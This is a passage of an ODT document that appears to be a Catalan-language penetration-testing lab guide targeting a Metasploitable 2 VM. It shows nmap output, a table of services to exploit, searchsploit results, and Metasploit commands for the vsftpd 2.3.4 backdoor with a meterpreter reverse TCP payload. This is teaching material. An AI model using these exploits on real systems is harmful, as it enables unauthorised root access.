      <text:p text:style-name="Codi_20_Ini">139/tcp <text:s text:c="2"/>open <text:s/>netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</text:p>
      <text:p text:style-name="Codi_20_Ini">445/tcp <text:s text:c="2"/>open <text:s/>netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)</text:p>
      <text:p text:style-name="Codi_20_Ini">512/tcp <text:s text:c="2"/>open <text:s/>exec <text:s text:c="7"/>netkit-rsh rexecd</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:soft-page-break/>513/tcp <text:s text:c="2"/>open <text:s/>login?</text:p>
      <text:p text:style-name="Codi_20_Ini">514/tcp <text:s text:c="2"/>open <text:s/>shell <text:s text:c="6"/>Netkit rshd</text:p>
      <text:p text:style-name="Codi_20_Ini">1099/tcp <text:s/>open <text:s/>java-rmi <text:s text:c="3"/>GNU Classpath grmiregistry</text:p>
      <text:p text:style-name="Codi_20_Ini">1524/tcp <text:s/>open <text:s/>bindshell <text:s text:c="2"/>Metasploitable root shell</text:p>
      <text:p text:style-name="Codi_20_Ini">2049/tcp <text:s/>open <text:s/>nfs <text:s text:c="8"/>2-4 (RPC #100003)</text:p>
      <text:p text:style-name="Codi_20_Ini">2121/tcp <text:s/>open <text:s/>ftp <text:s text:c="8"/>ProFTPD 1.3.1</text:p>
      <text:p text:style-name="Codi_20_Ini">3306/tcp <text:s/>open <text:s/>mysql <text:s text:c="6"/>MySQL 5.0.51a-3ubuntu5</text:p>
      <text:p text:style-name="Codi_20_Ini">| mysql-info: </text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>Protocol: 10</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>Version: 5.0.51a-3ubuntu5</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>Thread ID: 9</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>Capabilities flags: 43564</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>Some Capabilities: SupportsCompression, Support41Auth, SupportsTransactions, ConnectWithDatabase, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, LongColumnFlag</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>Status: Autocommit</text:p>
      <text:p text:style-name="Codi_20_Ini">|_ <text:s/>Salt: "dRMjP/;wj/H\wa^8:X1</text:p>
      <text:p text:style-name="Codi_20_Ini">3632/tcp <text:s/>open <text:s/>distccd <text:s text:c="4"/>distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))</text:p>
      <text:p text:style-name="Codi_20_Ini">5432/tcp <text:s/>open <text:s/>postgresql <text:s/>PostgreSQL DB 8.3.0 - 8.3.7</text:p>
      <text:p text:style-name="Codi_20_Ini">| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX</text:p>
      <text:p text:style-name="Codi_20_Ini">| Not valid before: 2010-03-17T14:07:45</text:p>
      <text:p text:style-name="Codi_20_Ini">|_Not valid after: <text:s/>2010-04-16T14:07:45</text:p>
      <text:p text:style-name="Codi_20_Ini">|_ssl-date: 2026-08-07T09:47:05+00:00; -1s from scanner time.</text:p>
      <text:p text:style-name="Codi_20_Ini">5900/tcp <text:s/>open <text:s/>vnc <text:s text:c="8"/>VNC (protocol 3.3)</text:p>
      <text:p text:style-name="Codi_20_Ini">| vnc-info: </text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>Protocol version: 3.3</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>Security types: </text:p>
      <text:p text:style-name="Codi_20_Ini">|_ <text:s text:c="3"/>VNC Authentication (2)</text:p>
      <text:p text:style-name="Codi_20_Ini">6000/tcp <text:s/>open <text:s/>X11 <text:s text:c="8"/>(access denied)</text:p>
      <text:p text:style-name="Codi_20_Ini">6667/tcp <text:s/>open <text:s/>irc <text:s text:c="8"/>UnrealIRCd</text:p>
      <text:p text:style-name="Codi_20_Ini">6697/tcp <text:s/>open <text:s/>irc <text:s text:c="8"/>UnrealIRCd</text:p>
      <text:p text:style-name="Codi_20_Ini">8009/tcp <text:s/>open <text:s/>ajp13 <text:s text:c="6"/>Apache Jserv (Protocol v1.3)</text:p>
      <text:p text:style-name="Codi_20_Ini">|_ajp-methods: Failed to get a valid response for the OPTION request</text:p>
      <text:p text:style-name="Codi_20_Ini">8180/tcp <text:s/>open <text:s/>http <text:s text:c="7"/>Apache Tomcat/Coyote JSP engine 1.1</text:p>
      <text:p text:style-name="Codi_20_Ini">|_http-title: Apache Tomcat/5.5</text:p>
      <text:p text:style-name="Codi_20_Ini">|_http-server-header: Apache-Coyote/1.1</text:p>
      <text:p text:style-name="Codi_20_Ini">|_http-favicon: Apache Tomcat</text:p>
      <text:p text:style-name="Codi_20_Ini">8787/tcp <text:s/>open <text:s/>drb <text:s text:c="8"/>Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)</text:p>
      <text:p text:style-name="Codi_20_Ini">37295/tcp open <text:s/>status <text:s text:c="5"/>1 (RPC #100024)</text:p>
      <text:p text:style-name="Codi_20_Ini">44105/tcp open <text:s/>nlockmgr <text:s text:c="3"/>1-4 (RPC #100021)</text:p>
      <text:p text:style-name="Codi_20_Ini">48454/tcp open <text:s/>mountd <text:s text:c="5"/>1-3 (RPC #100005)</text:p>
      <text:p text:style-name="Codi_20_Ini">52833/tcp open <text:s/>java-rmi <text:s text:c="3"/>GNU Classpath grmiregistry</text:p>
      <text:p text:style-name="Codi_20_Ini">MAC Address: 08:00:27:A3:EC:AF (Oracle VirtualBox virtual NIC)</text:p>
      <text:p text:style-name="Codi_20_Ini">Service Info: Hosts: <text:s/>metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">Host script results:</text:p>
      <text:p text:style-name="Codi_20_Ini">| smb-os-discovery: </text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>OS: Unix (Samba 3.0.20-Debian)</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>Computer name: metasploitable</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>NetBIOS computer name: </text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>Domain name: thos.local</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>FQDN: metasploitable.thos.local</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:soft-page-break/>|_ <text:s/>System time: 2026-08-07T05:46:58-04:00</text:p>
      <text:p text:style-name="Codi_20_Ini">|_clock-skew: mean: 1h00m01s, deviation: 2h00m05s, median: -1s</text:p>
      <text:p text:style-name="Codi_20_Ini">| smb-security-mode: </text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>account_used: guest</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>authentication_level: user</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>challenge_response: supported</text:p>
      <text:p text:style-name="Codi_20_Ini">|_ <text:s/>message_signing: disabled (dangerous, but default)</text:p>
      <text:p text:style-name="Codi_20_Ini">|_smb2-time: Protocol negotiation failed (SMB2)</text:p>
      <text:p text:style-name="Codi_20_Ini">|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</text:p>
      <text:p text:style-name="Codi_20_Ini">Nmap done: 1 IP address (1 host up) scanned in 149.31 seconds</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="77"/></text:p>
      <text:p text:style-name="Codi_20_Ini">┌──(ramon㉿kali)-[~]</text:p>
      <text:p text:style-name="Codi_20_Ini">└─$ </text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="serveis-crítics-a-explotar-prioritàriament"/><text:bookmark-start text:name="__RefHeading___Toc1938_1837196447"/>Serveis crítics a explotar prioritàriament<text:bookmark-end text:name="serveis-crítics-a-explotar-prioritàriament"/><text:bookmark-end text:name="__RefHeading___Toc1938_1837196447"/></text:h>
      <table:table table:name="Table4" table:style-name="Table4">
        <table:table-column table:style-name="Table4.A" table:number-columns-repeated="3"/>
        <table:table-header-rows>
          <table:table-row>
            <table:table-cell table:style-name="Table4.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">Port</text:p>
            </table:table-cell>
            <table:table-cell table:style-name="Table4.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">Servei</text:p>
            </table:table-cell>
            <table:table-cell table:style-name="Table4.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">Per què és crític</text:p>
            </table:table-cell>
          </table:table-row>
        </table:table-header-rows>
        <table:table-row>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">21/tcp</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">vsftpd 2.3.4</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="T1">Backdoor conegut</text:span> (el que ja tens documentat a la Fase 3) — accés root immediat</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">1524/tcp</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">bindshell</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Literalment etiquetat “Metasploitable root shell” — shell oberta sense autenticar</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">6667/tcp, 6697/tcp</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">UnrealIRCd</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Backdoor a la versió 3.2.8.1 (<text:span text:style-name="CodiInline">exploit/unix/irc/unreal_ircd_3281_backdoor</text:span>)</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">3632/tcp</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">distccd</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Execució remota d’ordres sense autenticació</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">139/445/tcp</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Samba 3.0.20</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Vulnerable a <text:span text:style-name="CodiInline">usermap_script</text:span> (RCE)</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">5432/tcp</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">PostgreSQL 8.3</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Credencials per defecte + vulnerabilitats conegudes d’aquesta branca</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">8180/tcp</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Tomcat 5.5</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table4.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Sovint amb <text:span text:style-name="CodiInline">tomcat:tomcat</text:span> per defecte al manager → <text:soft-page-break/>desplegament de WAR maliciós</text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="detalls-que-criden-latenció"/><text:bookmark-start text:name="__RefHeading___Toc1940_1837196447"/>Detalls que criden l’atenció<text:bookmark-end text:name="detalls-que-criden-latenció"/><text:bookmark-end text:name="__RefHeading___Toc1940_1837196447"/></text:h>
      <text:list text:style-name="L15">
        <text:list-item>
          <text:p text:style-name="P20"><text:span text:style-name="CodiInline">21/tcp ftp-anon</text:span>: accés FTP anònim permès, i a més la versió és exactament la 2.3.4 amb el backdoor — doble porta d’entrada al mateix servei.</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P20"><text:span text:style-name="CodiInline">smb-os-discovery</text:span><text:span text:style-name="T1"> mostra </text:span><text:span text:style-name="CodiInline">Domain name: thos.local</text:span> i <text:span text:style-name="CodiInline">FQDN: metasploitable.thos.local</text:span> — confirma que la màquina ja resol correctament dins del domini.</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P20"><text:span text:style-name="CodiInline">message_signing: disabled</text:span> a SMB — permet atacs de tipus SMB relay, un bon punt per ampliar la pràctica amb Responder/ntlmrelayx si vols anar més enllà del guió bàsic.</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P20"><text:span text:style-name="CodiInline">clock-skew: mean 1h00m01s</text:span> — desviació horària notable entre Kali i la víctima; no és una vulnerabilitat en si, però val la pena tenir-ho present perquè en escenaris reals un rellotge desincronitzat pot trencar Kerberos o invalidar certificats TLS.</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P20"><text:span text:style-name="T1">Certificats SSL/TLS caducats el 2010</text:span> (a SMTP i PostgreSQL) — encara funcionen perquè cap dels dos serveis verifica la caducitat.</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P20"><text:span text:style-name="T1">SSLv2 encara actiu a SMTP</text:span>, amb xifratge d’exportació de 40 bits (<text:span text:style-name="CodiInline">RC4_128_EXPORT40</text:span>) — trencable en segons, bon exemple de xifratge obsolet.</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P20"><text:span text:style-name="T1">X11 (port 6000) amb </text:span>“<text:span text:style-name="T1">access denied</text:span>” — el mateix Nmap ja indica que està protegit, no és una via d’entrada immediata en aquest cas.</text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="fase-2-identifica-vulnerabilitats"/><text:bookmark-start text:name="__RefHeading___Toc1942_1837196447"/>2.8. Fase 2 — Identifica vulnerabilitats<text:bookmark-end text:name="fase-2-identifica-vulnerabilitats"/><text:bookmark-end text:name="__RefHeading___Toc1942_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph"><text:span text:style-name="T1">Tasca:</text:span> Amb les versions detectades, cerca vulnerabilitats conegudes.</text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">searchsploit</text:span><text:span text:style-name="NormalTok"> vsftpd 2.3.4</text:span> </text:p>
      <text:p text:style-name="First_20_paragraph">Metasploitable 2 conté diverses vulnerabilitats didàctiques clàssiques:</text:p>
      <table:table table:name="Table5" table:style-name="Table5">
        <table:table-column table:style-name="Table5.A"/>
        <table:table-column table:style-name="Table5.B" table:number-columns-repeated="2"/>
        <table:table-header-rows>
          <table:table-row>
            <table:table-cell table:style-name="Table5.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">Servei</text:p>
            </table:table-cell>
            <table:table-cell table:style-name="Table5.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">Vulnerabilitat</text:p>
            </table:table-cell>
            <table:table-cell table:style-name="Table5.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">Mòdul Metasploit</text:p>
            </table:table-cell>
          </table:table-row>
        </table:table-header-rows>
        <table:table-row>
          <table:table-cell table:style-name="Table5.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">vsftpd 2.3.4</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table5.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Backdoor intencionat</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table5.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="CodiInline">exploit/unix/ftp/vsftpd_234_backdoor</text:span></text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table5.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">distccd</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table5.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Execució remota d’ordres</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table5.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="CodiInline">exploit/unix/misc/distcc_exec</text:span></text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table5.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Samba</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table5.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">usermap_script</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table5.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="CodiInline">exploit/multi/samba/usermap_script</text:span></text:p>
          </table:table-cell>
        </table:table-row>
        <text:soft-page-break/>
        <table:table-row>
          <table:table-cell table:style-name="Table5.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">UnrealIRCd</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table5.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Backdoor</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table5.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="CodiInline">exploit/unix/irc/unreal_ircd_3281_backdoor</text:span></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="First_20_paragraph">Sortida:</text:p>
      <text:p text:style-name="Codi_20_Ini">┌──(ramon㉿kali)-[~]</text:p>
      <text:p text:style-name="Codi_20_Ini">└─$ searchsploit vsftpd 2.3.4</text:p>
      <text:p text:style-name="Codi_20_Ini">------------------------------------------- ---------------------------------</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s/>Exploit Title <text:s text:c="28"/>| <text:s/>Path</text:p>
      <text:p text:style-name="Codi_20_Ini">------------------------------------------- ---------------------------------</text:p>
      <text:p text:style-name="Codi_20_Ini">vsftpd 2.3.4 - Backdoor Command Execution <text:s/>| unix/remote/17491.rb</text:p>
      <text:p text:style-name="Codi_20_Ini">vsftpd 2.3.4 - Backdoor Command Execution <text:s/>| unix/remote/49757.py</text:p>
      <text:p text:style-name="Codi_20_Ini">------------------------------------------- ---------------------------------</text:p>
      <text:p text:style-name="Codi_20_Ini">Shellcodes: No Results</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="77"/></text:p>
      <text:p text:style-name="Codi_20_Ini">┌──(ramon㉿kali)-[~]</text:p>
      <text:p text:style-name="Codi_20_Ini">└─$ </text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="fase-3-explota-amb-metasploit"/><text:bookmark-start text:name="__RefHeading___Toc1944_1837196447"/>2.9. Fase 3 — Explota amb Metasploit<text:bookmark-end text:name="fase-3-explota-amb-metasploit"/><text:bookmark-end text:name="__RefHeading___Toc1944_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph"><text:span text:style-name="T1">Tasca:</text:span> Documenta, pas a pas i amb captures, el procés complet d’explotació d’almenys un dels serveis vulnerables.</text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="què-és-un-exploit"/><text:bookmark-start text:name="__RefHeading___Toc1946_1837196447"/>Què és un exploit?<text:bookmark-end text:name="què-és-un-exploit"/><text:bookmark-end text:name="__RefHeading___Toc1946_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph">Un <text:span text:style-name="T1">exploit</text:span> és un programa, fragment de codi o tècnica que aprofita una vulnerabilitat (un error o forat de seguretat) en un sistema, aplicació o protocol per fer que aquest es comporti d’una manera no prevista pel seu disseny.</text:p>
      <text:p text:style-name="P5">Idea clau</text:p>
      <text:p text:style-name="Text_20_body">La vulnerabilitat és el “forat” (per exemple, un error de programació que permet escriure més dades de les que caben en un buffer). L’exploit és el “codi” que sap com utilitzar aquest forat de manera concreta per aconseguir un objectiu.</text:p>
      <text:p text:style-name="P5">Què pot aconseguir un exploit</text:p>
      <text:list text:style-name="L16">
        <text:list-item>
          <text:p text:style-name="P21">Execució de codi arbitrari (aconseguir que el sistema executi ordres que l’atacant vulgui)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P21">Escalada de privilegis (passar d’usuari normal a administrador/root)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P21">Denegació de servei (fer caure un servei o sistema)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P21">Filtració d’informació (llegir dades que no hauria de poder veure)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P21">Bypass d’autenticació (accedir sense credencials vàlides)</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P7">Tipus habituals</text:p>
      <text:list text:style-name="L17">
        <text:list-item>
          <text:p text:style-name="P22"><text:soft-page-break/><text:span text:style-name="T1">Exploit local</text:span>: requereix accés previ al sistema (per exemple, per escalar privilegis)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P22"><text:span text:style-name="T1">Exploit remot</text:span>: s’executa des de fora, a través de la xarxa, sense accés previ</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P22"><text:span text:style-name="T1">0-day (zero-day)</text:span>: aprofita una vulnerabilitat encara desconeguda pel fabricant/desenvolupador, per la qual no existeix pedaç</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P22"><text:span text:style-name="T1">PoC (Proof of Concept)</text:span>: exploit demostratiu, sovint sense càrrega maliciosa, que demostra que la vulnerabilitat és explotable</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="First_20_paragraph"><text:span text:style-name="T1">Diferència amb </text:span>“<text:span text:style-name="T1">vulnerabilitat</text:span>”<text:span text:style-name="T1"> i </text:span>“<text:span text:style-name="T1">payload</text:span>”</text:p>
      <text:list text:style-name="L18">
        <text:list-item>
          <text:p text:style-name="P23"><text:span text:style-name="T2">Vulnerabilitat</text:span>: el defecte que fa possible l’atac</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P23"><text:span text:style-name="T2">Exploit</text:span>: el mecanisme que aprofita aquest defecte</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P23"><text:span text:style-name="T2">Payload</text:span>: el que fa l’exploit un cop ha aconseguit l’accés (per exemple, obrir una shell remota, instal·lar programari maliciós, etc.)</text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="alternativa-1-vsftpd-backdoor"/><text:bookmark-start text:name="__RefHeading___Toc1948_1837196447"/>Alternativa 1: <text:span text:style-name="CodiInline">vsftpd backdoor</text:span><text:bookmark-end text:name="alternativa-1-vsftpd-backdoor"/><text:bookmark-end text:name="__RefHeading___Toc1948_1837196447"/></text:h>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">msfconsole</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">use</text:span><text:span text:style-name="NormalTok"> exploit/unix/ftp/vsftpd_234_backdoor</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="BuiltInTok">set</text:span><text:span text:style-name="NormalTok"> RHOSTS 192.168.100.20</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="BuiltInTok">set</text:span><text:span text:style-name="NormalTok"> LHOST 192.168.100.10</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">run</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">getuid</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="ExtensionTok">sysinfo</text:span> </text:p>
      <text:p text:style-name="First_20_paragraph">Si l’explotació té èxit, s’obté una shell amb privilegis root directament (aquest exemple és especialment il·lustratiu perquè el backdoor és senzill d’entendre).</text:p>
      <text:p text:style-name="Codi_20_Ini">┌──(ramon㉿kali)-[~]</text:p>
      <text:p text:style-name="Codi_20_Ini">└─$ msfconsole</text:p>
      <text:p text:style-name="Codi_20_Ini">Metasploit tip: View all productivity tips with the tips command</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="50"/></text:p>
      <text:p text:style-name="Codi_20_Ini">Call trans opt: received. 2-19-98 13:24:18 REC:Loc</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="77"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="5"/>Trace program: running <text:s text:c="49"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="77"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="11"/>wake up, Neo... <text:s text:c="50"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="8"/>the matrix has you <text:s text:c="50"/></text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="6"/>follow the white rabbit.</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="10"/>knock, knock, Neo.</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="24"/>(`. <text:s text:c="8"/>,-,</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="24"/>` `. <text:s text:c="3"/>,;' /</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="25"/>`. <text:s/>,'/ .'</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="26"/>`. X /.'</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="16"/>.-;--''--.._` ` (</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="14"/>.' <text:s text:c="11"/>/ <text:s text:c="2"/>`</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="13"/>, <text:s text:c="10"/>` ' <text:s text:c="2"/>Q '</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="13"/>, <text:s text:c="8"/>, <text:s text:c="2"/>`._ <text:s text:c="3"/>\</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="10"/>,.| <text:s text:c="8"/>' <text:s text:c="4"/>`-.;_'</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="10"/>: <text:s/>. ` <text:s/>; <text:s text:c="3"/>` <text:s/>` --,.._;</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="11"/>' ` <text:s text:c="3"/>, <text:s text:c="2"/>) <text:s text:c="2"/>.'</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:soft-page-break/><text:s text:c="14"/>`._ , <text:s/>' <text:s text:c="2"/>/_</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="17"/>; ,''-,;' ``-</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="18"/>``-..__``--`</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="29"/>https://metasploit.com</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini"><text:s text:c="7"/>=[ metasploit v6.4.135-dev <text:s text:c="30"/>]</text:p>
      <text:p text:style-name="Codi_20_Ini">+ -- --=[ 2,654 exploits - 1,338 auxiliary - 2,141 payloads <text:s text:c="4"/>]</text:p>
      <text:p text:style-name="Codi_20_Ini">+ -- --=[ 433 post - 49 encoders - 14 nops - 12 evasion <text:s text:c="8"/>]</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">Metasploit Documentation: https://docs.metasploit.com/</text:p>
      <text:p text:style-name="Codi_20_Ini">The Metasploit Framework is a Rapid7 Open Source Project</text:p>
      <text:p text:style-name="Codi_20_Ini"/>
      <text:p text:style-name="Codi_20_Ini">msf &gt; use exploit/unix/ftp/vsftpd_234_backdoor</text:p>
      <text:p text:style-name="Codi_20_Ini">[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp</text:p>
